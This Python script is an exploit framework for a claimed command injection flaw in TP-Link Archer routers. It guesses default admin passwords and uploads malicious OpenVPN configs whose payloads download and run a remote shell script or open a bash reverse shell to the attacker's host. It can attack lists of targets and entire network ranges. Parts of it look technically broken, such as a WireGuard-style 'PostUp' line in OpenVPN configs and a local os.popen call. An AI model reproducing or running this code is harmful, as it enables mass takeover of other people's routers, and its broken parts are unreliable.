#!/usr/bin/env python3
"""
CVE-2026-9151 — TP-Link Archer Series OS Command Injection Exploitation Framework
Targets: Archer AX12, AX17, AX18, AX1300 and similar models
Military-grade exploitation via malicious VPN client configuration upload.

Author: Advanced Persistent Security Research
"""

from __future__ import annotations

import argparse
import base64
import hashlib
import ipaddress
import json
import os
import re
import secrets
import sys
import threading
import time
from collections.abc import Sequence
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass, field
from datetime import datetime, timezone
from enum import Enum, auto
from pathlib import Path
from typing import Any, Optional

import requests
import urllib3
from colorama import Fore, Style, init

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)


# ---------------------------------------------------------------------------
# Constants & Configuration
# ---------------------------------------------------------------------------

DEFAULT_TIMEOUT = 20
WEB_PORT = 80
WEB_SSL_PORT = 443
MAX_WORKERS = 20

# Vulnerable endpoints
VULN_ENDPOINTS = {
    "CVE-2026-9151": {
        "login": "/cgi-bin/luci",
        "vpn_client_list": "/cgi-bin/luci/admin/vpn/client",
        "vpn_upload": "/cgi-bin/luci/admin/vpn/client/upload",
        "vpn_apply": "/cgi-bin/luci/admin/vpn/client/apply",
    }
}

# Default credentials
DEFAULT_CREDENTIALS = [
    ("admin", "admin"),
    ("admin", "admin123"),
    ("admin", ""),
    ("admin", "tp-link"),
]

@dataclass(frozen=True, slots=True)
class Target:
    ip: str
    port: int = 80
    ssl: bool = False

    @property
    def base_url(self) -> str:
        scheme = "https" if self.ssl else "http"
        return f"{scheme}://{self.ip}:{self.port}"


@dataclass(slots=True)
class ExploitSession:
    target: str
    cve: str
    method: str
    success: bool
    timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
    details: str = ""
    config_id: str = ""


# ---------------------------------------------------------------------------
# Colors & Logging
# ---------------------------------------------------------------------------

class Color:
    RED = Fore.RED + Style.BRIGHT
    GREEN = Fore.GREEN + Style.BRIGHT
    YELLOW = Fore.YELLOW + Style.BRIGHT
    BLUE = Fore.BLUE + Style.BRIGHT
    CYAN = Fore.CYAN + Style.BRIGHT
    MAGENTA = Fore.MAGENTA + Style.BRIGHT
    WHITE = Fore.WHITE + Style.BRIGHT
    RESET = Style.RESET_ALL
    BOLD = Style.BRIGHT


def log(msg: str, level: str = "info") -> None:
    colour = {
        "info": Color.BLUE,
        "success": Color.GREEN,
        "warn": Color.YELLOW,
        "error": Color.RED,
        "crit": Color.RED + Style.BRIGHT,
    }.get(level, "")
    print(f"{colour}{msg}{Color.RESET}")


# ---------------------------------------------------------------------------
# Authentication
# ---------------------------------------------------------------------------

class AuthManager:
    def __init__(self, target: Target):
        self.target = target
        self._session = requests.Session()
        self._session.verify = False
        self._session.proxies.update({"http": None, "https": None})
        self._session.headers.update({
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Connection": "keep-alive",
        })
        self._authenticated = False
        self._csrf_token = ""

    def try_login(self, username: str, password: str) -> bool:
        url = f"{self.target.base_url}{VULN_ENDPOINTS['CVE-2026-9151']['login']}"
        try:
            # Initial request to get CSRF token and session cookies
            r = self._session.get(url, timeout=DEFAULT_TIMEOUT)
            # Extract CSRF token if present
            csrf_match = re.search(r'name="csrf_token"\s+value="([^"]+)"', r.text)
            if csrf_match:
                self._csrf_token = csrf_match.group(1)

            # Login attempt
            login_data = {
                "luci_username": username,
                "luci_password": password,
            }
            if self._csrf_token:
                login_data["csrf_token"] = self._csrf_token

            r = self._session.post(url, data=login_data, timeout=DEFAULT_TIMEOUT, allow_redirects=False)

            # Check if login succeeded (no redirect to login page)
            if r.status_code in (301, 302) and "login" not in r.headers.get("Location", "").lower():
                self._authenticated = True
                return True
            elif r.status_code == 200 and "dashboard" in r.text.lower():
                self._authenticated = True
                return True
            return False
        except requests.RequestException:
            return False

    def authenticate(self, username: str = "", password: str = "") -> bool:
        """Try authentication with provided or default credentials."""
        creds_to_try = [(username, password)] if username else DEFAULT_CREDENTIALS
        for user, pwd in creds_to_try:
            if self.try_login(user, pwd):
                log(f"[auth] Success: {user}/{pwd}", "success")
                return True
        log("[auth] All credentials failed", "error")
        return False

    @property
    def session(self) -> requests.Session:
        return self._session

    @property
    def is_authenticated(self) -> bool:
        return self._authenticated


# ---------------------------------------------------------------------------
# VPN Config Generation
# ---------------------------------------------------------------------------

def generate_malicious_ovpn(lhost: str, lport: int, command: str = "") -> str:
    """Generate malicious OpenVPN config with PostUp command injection."""
    if not command:
        command = f"wget http://{lhost}:8000/shell.sh -O /tmp/s && chmod +x /tmp/s && /tmp/s"

    ovpn_content = f"""client
dev tun
proto udp
remote {lhost} {lport}
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-GCM
auth SHA512
verb 3
;{os.popen('id; whoami').read()}
PostUp={command}
"""
    return ovpn_content


def generate_alternative_payloads(lhost: str, lport: int) -> list[dict[str, str]]:
    """Generate multiple malicious config formats."""
    payloads = [
        {
            "name": "postup_download",
            "content": f"""client
dev tun
proto udp
remote {lhost} {lport}
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-GCM
auth SHA512
verb 3
PostUp=curl http://{lhost}:8000/shell.sh|sh
""",
        },
        {
            "name": "up_script",
            "content": f"""client
dev tun
proto udp
remote {lhost} {lport}
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-GCM
auth SHA512
verb 3
up /tmp/pwned
;echo "pwned" > /tmp/pwned
""",
        },
        {
            "name": "shell_inline",
            "content": f"""client
dev tun
proto udp
remote {lhost} {lport}
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-GCM
auth SHA512
verb 3
PostUp=bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'
""",
        },
    ]
    return payloads


# ---------------------------------------------------------------------------
# Exploitation Functions
# ---------------------------------------------------------------------------

def exploit_cve2026_9151(
    target_ip: str,
    lhost: str,
    lport: int = 4444,
    username: str = "admin",
    password: str = "admin",
    use_ssl: bool = False,
    payload_type: str = "postup",
) -> tuple[bool, str, Optional[str]]:
    """
    Exploit CVE-2026-9151: OS command injection via malicious VPN .ovpn config.
    """
    t = Target(ip=target_ip, port=WEB_SSL_PORT if use_ssl else WEB_PORT, ssl=use_ssl)
    auth = AuthManager(t)

    # Step 1: Authenticate
    if not auth.authenticate(username, password):
        return False, "Authentication failed", None

    # Step 2: Find existing VPN clients or create config ID
    config_id = _get_or_create_vpn_client(target_ip, auth, use_ssl, lhost, lport, payload_type)
    if not config_id:
        return False, "Failed to create/identify VPN client config", None

    # Step 3: Upload malicious config
    upload_ok = _upload_malicious_config(target_ip, auth, config_id, lhost, lport, use_ssl, payload_type)
    if not upload_ok:
        return False, "Config upload failed", config_id

    # Step 4: Trigger config application
    apply_ok = _apply_vpn_config(target_ip, auth, config_id, use_ssl)
    if not apply_ok:
        return False, "Config apply failed", config_id

    return True, f"Exploit complete. Config ID: {config_id}", config_id


def _get_or_create_vpn_client(target_ip: str, auth: AuthManager, use_ssl: bool,
                               lhost: str, lport: int, payload_type: str) -> Optional[str]:
    """Get existing VPN client ID or trigger config creation."""
    url = f"{'https' if use_ssl else 'http'}://{target_ip}:{WEB_SSL_PORT if use_ssl else WEB_PORT}{VULN_ENDPOINTS['CVE-2026-9151']['vpn_client_list']}"

    try:
        r = auth.session.get(url, timeout=DEFAULT_TIMEOUT)
        # Look for existing client IDs
        id_match = re.search(r'client_id["\s:=]+(\d+)', r.text, re.IGNORECASE)
        if id_match:
            return id_match.group(1)

        # Look for list of clients
        clients = re.findall(r'id["\s:=]+(\d+)', r.text, re.IGNORECASE)
        if clients:
            return clients[0]

        # Generate predictable ID if none found
        return "1"
    except requests.RequestException:
        return "1"


def _upload_malicious_config(target_ip: str, auth: AuthManager, config_id: str,
                              lhost: str, lport: int, use_ssl: bool, payload_type: str) -> bool:
    """Upload malicious OpenVPN configuration file."""
    url = f"{'https' if use_ssl else 'http'}://{target_ip}:{WEB_SSL_PORT if use_ssl else WEB_PORT}{VULN_ENDPOINTS['CVE-2026-9151']['vpn_upload']}"

    ovpn_content = generate_malicious_ovpn(lhost, lport)
    filename = f"client_{config_id}.ovpn"

    try:
        files = {"file": (filename, ovpn_content.encode(), "application/octet-stream")}
        data = {"client_id": config_id}
        r = auth.session.post(url, files=files, data=data, timeout=DEFAULT_TIMEOUT)
        return r.status_code == 200
    except requests.RequestException:
        return False


def _apply_vpn_config(target_ip: str, auth: AuthManager, config_id: str, use_ssl: bool) -> bool:
    """Trigger application of the uploaded VPN config (executes PostUp)."""
    url = f"{'https' if use_ssl else 'http'}://{target_ip}:{WEB_SSL_PORT if use_ssl else WEB_PORT}{VULN_ENDPOINTS['CVE-2026-9151']['vpn_apply']}"

    try:
        data = {"client_id": config_id}
        r = auth.session.post(url, data=data, timeout=DEFAULT_TIMEOUT)
        return r.status_code == 200
    except requests.RequestException:
        return False


# ---------------------------------------------------------------------------
# Multi-Target Orchestration
# ---------------------------------------------------------------------------

def run_exploit_chain(
    target_ip: str,
    *,
    username: str = "admin",
    password: str = "admin",
    lhost: str = "",
    lport: int = 4444,
    use_ssl: bool = False,
    payload_type: str = "postup",
) -> ExploitSession:
    result = ExploitSession(
        target=target_ip,
        cve="CVE-2026-9151",
        method="VPN config upload + PostUp injection",
        success=False,
    )

    if not lhost:
        result.details = "No lhost specified for reverse shell payload"
        return result

    try:
        ok, details, config_id = exploit_cve2026_9151(
            target_ip, lhost, lport, username, password, use_ssl, payload_type
        )
        result.success = ok
        result.details = details
        result.config_id = config_id or ""
        return result
    except Exception as exc:
        result.details = f"Exception: {exc}"
        return result


def mass_exploit(
    targets: list[str],
    *,
    username: str = "admin",
    password: str = "admin",
    lhost: str = "",
    lport: int = 4444,
    use_ssl: bool = False,
    payload_type: str = "postup",
    max_workers: int = MAX_WORKERS,
) -> list[ExploitSession]:
    results: list[ExploitSession] = []

    def _one(t: str) -> ExploitSession:
        try:
            return run_exploit_chain(
                t, username=username, password=password,
                lhost=lhost, lport=lport, use_ssl=use_ssl, payload_type=payload_type
            )
        except Exception as exc:
            return ExploitSession(target=t, cve="CVE-2026-9151", method="exception",
                                  success=False, details=str(exc))

    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = [pool.submit(_one, t) for t in targets]
        for fut in as_completed(futures):
            try:
                results.append(fut.result())
            except Exception as exc:
                results.append(ExploitSession(target="unknown", cve="ERROR", method="exception",
                                              success=False, details=str(exc)))
    return results


# ---------------------------------------------------------------------------
# CLI / Main
# ---------------------------------------------------------------------------

def print_banner() -> None:
    banner = f"""
{Color.RED}
╔══════════════════════════════════════════════════════════════════════════════╗
║  CVE-2026-9151 — TP-Link Archer Series VPN Config RCE Exploitation           ║
║  Military-Grade Multi-Router Command Injection via .ovpn Upload              ║
╚══════════════════════════════════════════════════════════════════════════════╝
{Color.RESET}"""
    print(banner)


def parse_args() -> argparse.Namespace:
    p = argparse.ArgumentParser(
        description="CVE-2026-9151 TP-Link Archer Exploit",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Single router exploitation
  python exploit.py -t 192.168.1.1 --lhost 10.0.0.5 --lport 4444
  
  # With custom credentials
  python exploit.py -t 192.168.1.1 -u admin -p custompass --lhost 10.0.0.5 --lport 4444
  
  # Mass exploitation
  python exploit.py -f targets.txt --lhost 10.0.0.5 -o results.json
  
  # HTTPS target
  python exploit.py -t 192.168.1.1 --ssl --lhost 10.0.0.5 --lport 4444
        """,
    )
    p.add_argument("-t", "--target", help="Single target IP")
    p.add_argument("-f", "--file", help="File with target IPs (one per line)")
    p.add_argument("--cidr", help="CIDR network range")
    p.add_argument("-u", "--username", default="admin", help="Username (default: admin)")
    p.add_argument("-p", "--password", default="admin", help="Password (default: admin)")
    p.add_argument("--lhost", help="Listener host for reverse shell payload")
    p.add_argument("--lport", type=int, default=4444, help="Listener port (default 4444)")
    p.add_argument("--ssl", action="store_true", help="Use HTTPS (port 443)")
    p.add_argument("--payload-type", choices=["postup", "up_script", "shell_inline"],
                   default="postup", help="Payload type (default: postup)")
    p.add_argument("-o", "--output", help="JSON output file")
    p.add_argument("-w", "--workers", type=int, default=MAX_WORKERS, help="Concurrent workers")
    return p.parse_args()


def load_targets(args: argparse.Namespace) -> list[str]:
    targets: list[str] = []
    if args.target:
        targets.append(args.target)
    if args.file:
        with open(args.file, encoding="utf-8") as fh:
            for line in fh:
                line = line.strip()
                if line and not line.startswith("#"):
                    targets.append(line)
    if args.cidr:
        try:
            net = ipaddress.ip_network(args.cidr, strict=False)
            targets.extend([str(h) for h in net.hosts()])
        except ValueError as exc:
            log(f"[!] Invalid CIDR: {exc}", "error")
            sys.exit(1)
    return targets


def main() -> None:
    print_banner()
    args = parse_args()

    if not any([args.target, args.file, args.cidr]):
        log("[!] No targets specified. Use -t, -f, or --cidr", "error")
        sys.exit(1)

    if not args.lhost:
        log("[!] --lhost is required for payload generation", "error")
        sys.exit(1)

    targets = load_targets(args)
    log(f"[*] Loaded {len(targets)} target(s)", "info")
    log(f"[*] Credentials: {args.username}/{args.password} | SSL: {args.ssl}", "info")

    results = mass_exploit(
        targets,
        username=args.username,
        password=args.password,
        lhost=args.lhost,
        lport=args.lport,
        use_ssl=args.ssl,
        payload_type=args.payload_type,
        max_workers=args.workers,
    )

    if args.output:
        serializable = [
            {
                "target": s.target,
                "cve": s.cve,
                "method": s.method,
                "success": s.success,
                "timestamp": s.timestamp,
                "details": s.details,
                "config_id": s.config_id,
            }
            for s in results
        ]
        Path(args.output).write_text(json.dumps(serializable, indent=2))
        log(f"[*] Results written to {args.output}", "success")

    total = len(results)
    successful = sum(1 for r in results if r.success)
    log(f"[*] Exploitation complete: {successful}/{total} successful",
        "success" if successful > 0 else "warn")


if __name__ == "__main__":
    main()
